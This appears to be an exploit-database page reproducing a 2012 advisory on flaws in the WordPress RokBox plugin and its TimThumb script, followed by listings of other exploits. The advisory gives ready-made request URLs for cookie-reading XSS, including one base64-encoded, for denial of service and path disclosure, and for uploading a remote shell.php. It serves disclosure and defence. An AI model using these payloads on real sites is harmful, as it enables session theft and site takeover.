Menu

Search for hundreds of thousands of exploits

"WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext' Cross-Site Scripting"

Author

Exploit author

MustLive

Platform

Exploit platform

php

Release date

Exploit published date

2012-12-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
source: https://www.securityfocus.com/bid/56953/info

The TimThumb plug-in for WordPress is prone to multiple security vulnerabilities, including:

1. A cross-site scripting vulnerability
2. Multiple security-bypass vulnerabilities
3. An arbitrary file-upload vulnerability
4. An information-disclosure vulnerability
5. Multiple path-disclosure vulnerabilities
6. A denial-of-service vulnerability

Attackers can exploit these issues to bypass certain security restrictions, obtain sensitive information, perform certain administrative actions, gain unauthorized access, upload arbitrary files, compromise the application, access or modify data, cause denial-of-service conditions, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks may also be possible. 

XSS (WASC-08) (in versions of Rokbox with older versions of TimThumb):

http://www.example.complugins/wp_rokbox/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://www.example.complugins/wp_rokbox/thumb.php?src=http://

http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/page.png&h=1&w=1111111

http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://www.example.complugins/wp_rokbox/thumb.php?src=http://site&h=1&w=1
http://www.example.complugins/wp_rokbox/thumb.php?src=http://site.flickr.com&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://www.example.complugins/wp_rokbox/thumb.php?src=http://site/big_file&h=1&w=1
http://www.example.complugins/wp_rokbox/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

Arbitrary File Upload (WASC-31):

http://www.example.complugins/wp_rokbox/thumb.php?src=http://flickr.com.site.com/shell.php

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

http://www.example.complugins/wp_rokbox/thumb.php?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://www.example.complugins/wp_rokbox/thumb.php?file=1.flv&image=1.jpg
http://www.example.complugins/wp_rokbox/thumb.php?config=1.xml
http://www.example.complugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://www.example.complugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Information Leakage (WASC-13):

http://www.example.complugins/wp_rokbox/error_log

Leakage of error log with full paths.

Full path disclosure (WASC-13):

http://www.example.complugins/wp_rokbox/rokbox.php
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2014-07-13 "WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection" webapps php MustLive
2013-12-17 "WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery" webapps php MustLive
2013-09-19 "WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-19 "WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-18 "WordPress Plugin RokNewsPager - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-17 "WordPress Plugin RokStories - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-07-16 "MCImageManager - Multiple Vulnerabilities" webapps php MustLive
2013-04-21 "WordPress Theme Colormix - Multiple Vulnerabilities" webapps php MustLive
2013-04-13 "Aibolit - Information Disclosure" webapps multiple MustLive
2013-03-26 "IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities" remote multiple MustLive
2013-03-10 "SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities" webapps php MustLive
2013-03-01 "Question2Answer - Cross-Site Request Forgery" webapps php MustLive
2013-02-20 "ZeroClipboard 1.9.x - 'id' Cross-Site Scripting" webapps php MustLive
2013-02-02 "WordPress Theme flashnews - Multiple Input Validation Vulnerabilities" webapps php MustLive
2013-01-09 "tinybrowser - 'type' Cross-Site Scripting" webapps php MustLive
2013-01-09 "TinyBrowser - 'edit.php' Directory Listing" webapps php MustLive
2013-01-09 "TinyBrowser - 'tinybrowser.php' Directory Listing" webapps php MustLive
2012-12-17 "WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext' Cross-Site Scripting" webapps php MustLive
2012-10-28 "CorePlayer - 'callback' Cross-Site Scripting" webapps php MustLive
2012-10-18 "WordPress Plugin Wordfence Security - Cross-Site Scripting" webapps php MustLive
2012-09-28 "IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities" remote multiple MustLive
2012-09-15 "IFOBS - 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities" webapps jsp MustLive
2012-08-29 "JW Player - 'logo.link' Cross-Site Scripting" webapps php MustLive
2012-07-29 "JW Player - 'playerready' Cross-Site Scripting" webapps php MustLive
2012-06-29 "LIOOSYS CMS - SQL Injection / Information Disclosure" webapps php MustLive
2012-06-15 "WordPress Plugin ORGanizer - Multiple Vulnerabilities" webapps php MustLive
2012-05-21 "Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting" webapps php MustLive
2012-03-11 "EJBCA 4.0.7 - 'issuer' Cross-Site Scripting" webapps java MustLive
2012-02-26 "Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities" webapps php MustLive
2012-02-13 "D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery" remote hardware MustLive
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.